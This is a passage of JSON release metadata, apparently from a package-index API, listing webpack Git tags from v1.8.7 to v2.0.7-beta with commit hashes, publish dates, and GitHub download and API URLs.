.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/man